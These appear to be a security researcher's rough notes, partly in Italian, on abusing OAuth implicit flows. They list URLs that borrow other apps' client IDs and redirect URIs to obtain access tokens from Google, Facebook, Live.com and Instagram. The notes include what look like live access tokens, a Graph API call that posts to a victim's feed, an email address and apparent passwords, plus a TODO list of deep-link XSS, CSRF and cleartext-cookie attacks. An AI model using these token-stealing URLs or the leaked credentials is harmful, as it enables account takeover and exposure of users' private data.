https://accounts.google.com/o/oauth2/auth?scope=email%20profile%20openid&response_type=token&access_type=online&redirect_uri=http%3a%2f%2fninjakiwi.com%2fauth%2fgoogle_oauth2%2fcallback&approval_prompt&client_id=160396963065.apps.googleusercontent.com https://www.googleapis.com/oauth2/v1/userinfo?access_token=ya29.XgFbjPbzyhp0186dordLhWS3a0QQ10HLIi_-XHC2uEvXkvuL8op50do5ustZ4YQtqmVnLg_A-6_sFw https://www.facebook.com/dialog/oauth?app_id=570213692990512&client_id=570213692990512&domain=ninjakiwi.com&redirect_uri=http://ninjakiwi.com&response_type=token&scope=email https://graph.facebook.com/v2.3/me?access_token=CAAAAKLSe4lIBAOEhZAZBO7ZAJrdBYcPecNAbBX84RHQUh7OvUhJ4ecTURZCC3UqKrMtaCkLI8DL5D1Y3qk03GVCkN47FtRqg7eHy0WMTphtwF4aIbHveoBFZBnt6A4zgFZCvKT8pMeTHQXAcyKDRweStMHVkluaBRJ1VCsidvcT6JZACbb0LyA0vqBiUFtHCIZCVroSKkarIVgWY2NV8wMto https://graph.facebook.com/v1.0/me/friends?access_token=CAAIGmzid5DABAPrevVHwUdZBeDilbDdSZA6phiQdZAEn81IKWvbT1lHBFNxvit3QdCBSExkKEhVSZCHiAUvXyg0ZC7vrWLp79ZBKyzgAVUGkTNd8hqmt5g7rAxlXsfwPpG1LnxWZAMBuXjPUs1Ofqto8inaBRVWk0w0NZAjuFK4fFMS35BooRQvGZAGzNAJZA1YtsEBZAXlS63JVtZCZAIZAZBZCL62v https://graph.facebook.com/v2.3/me?fields=friends.limit%285%29&access_token=CAAAAKLSe4lIBAInkK6vevmjZAIvj7pEyiGnWBUnQKvUDTfLfhEdkcfK5DzO6OGSmz3ZCKhphCIWTzCpZCRla6wCzoJRe39ZBN1X7LG8ge0ZCjgJrHnyStHyjXd9pqkQyhxpkaDkqvyg9HJScOuba0ZCXnC2ZBSof5zLHb01tu5VdqAHvWRFAxFN8GcoJVVcdzQMVhHZAynE2dKbnGavuAM6p POST /me/feed?message=VeryNice&access_token=CAAAAKLSe4lIBAInkK6vevmjZAIvj7pEyiGnWBUnQKvUDTfLfhEdkcfK5DzO6OGSmz3ZCKhphCIWTzCpZCRla6wCzoJRe39ZBN1X7LG8ge0ZCjgJrHnyStHyjXd9pqkQyhxpkaDkqvyg9HJScOuba0ZCXnC2ZBSof5zLHb01tu5VdqAHvWRFAxFN8GcoJVVcdzQMVhHZAynE2dKbnGavuAM6p Questo va bene quasi per qualsiasi app (6p3So0GhyQP.js va cambiato random): https://www.facebook.com/connect/ping?client_id=174829003346&domain=play.spotify.com&origin=1&redirect_uri=http%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6p3So0GhyQw.js%3Fversion%3D41%23cb%3Df3a3b80c86a762c%26domain%3Dplay.spotify.com%26origin%3Dhttps%253A%252F%252Fplay.spotify.com%252Ffb38541379475c%26relation%3Dparent&response_type=token https://www.facebook.com/connect/ping?client_id=174829003346&origin=1&redirect_uri=http%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6p3So0GhyQo.js%3Fversion%3D41%23origin%3Dhttps%253A%252F%252Fplay.spotify.com&response_type=token - Uso in locale - https://www.facebook.com/connect/ping?response_type=token&client_id=162729813767876&redirect_uri=fb162729813767876%3A%2F%2Fauthorize (trip advisor) - Per lanciare faceweb su iOS fb://?al_applink_data=%7B%22target_url%22%3A+%22http%3A%2F%2Fbeta.facebook.com%22%7D ---> Da Live.com!!!!!!!! con tutti i privilegi https://www.facebook.com/connect/ping?client_id=30713015083&origin=1&redirect_uri=http%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6p3So0GhyQo.js%3Fversion%3D41%23origin%3Dhttps%253A%252F%252Fprofile.live.com&response_type=token -------------------- Linkedin su live.com https://login.live.com/oauth20_authorize.srf?client_id=0000000044004F21&redirect_uri=http%3A%2F%2Fa.www.linkedin.com%2Fgenie%2Fhandle&scope=wl.basic+wl.emails+wl.contacts_emails&response_type=token https://apis.live.net/v5.0/me/contacts?access_token= -> Power point su OneDrive: purtroppo solo in https https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&response_type=token&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=easi2&scope=service::ssl.live.com::MBI_SSL_SHORT&display=ios_phone&username=alfredocoriandoli@hotmail.com&locale=en-US https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&response_type=token&redirect_uri=https://login.live.com/oauth20_desktop.srf&scope=service::ssl.live.com::MBI_SSL_SHORT https://login.live.com/ppsecure/post.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&redirect_uri=https://login.live.com/oauth20_desktop.srf -------------------- Walgreens https://instagram.com/oauth/authorize/?client_id=a8749d359c064181811a384c36658bee&redirect_uri=instagram://connect&response_type=token polent4t0rron3 polent4t0rron3! db-auth dbapi-1 (fino a 6) dbx-dropbox ------------------------------------ TODO ------------------------------------ - Vuln su App (eg: youtube, dropobox, etc) - XSS via DeepLink - CSRF via DeepLink - Invalid Certs - Forzare invio cookie in chiaro via DeepLink ------------------------------------ GCM ------------------------------------ Sender ID: ID numerico che identifica l'app Application ID: Nome del package Registration ID: Ricevuto dal GCM quanodo ci si registra. - Dovrebbe essere segreto - Identifica quall'app su quel device - viene di solito salvata nelle preference - Salva anche la versione dell'app. Se c'e' una versione nuova dovrebbe invalidarlo e registrarlo di nuovo - Deve essere inviata OOB al server dell'app in qualche modo Canonical ID: se un app si registra due volte, il GCM gli offre questo ID (l'ultimo usato). Sta all'app decidere se usarlo Sender Auth Token: Identifica il server (segreto) - E' possibile intercettare la connessione fra il servizio GCM che gira sul device e Google? - E' possibile far leakare il Registration ID (ad esmempio di Facebook) usando la tecnica di OAuth redir? -------------------------------------------------------------------------------- iOS Captive http://init-p01st.push.apple.com www.appleiphonecell.com captive.apple.com captive.apple.com www.apple.com www.itools.info www.ibook.info www.airport.us www.thinkdifferent.us com.apple.WebSheet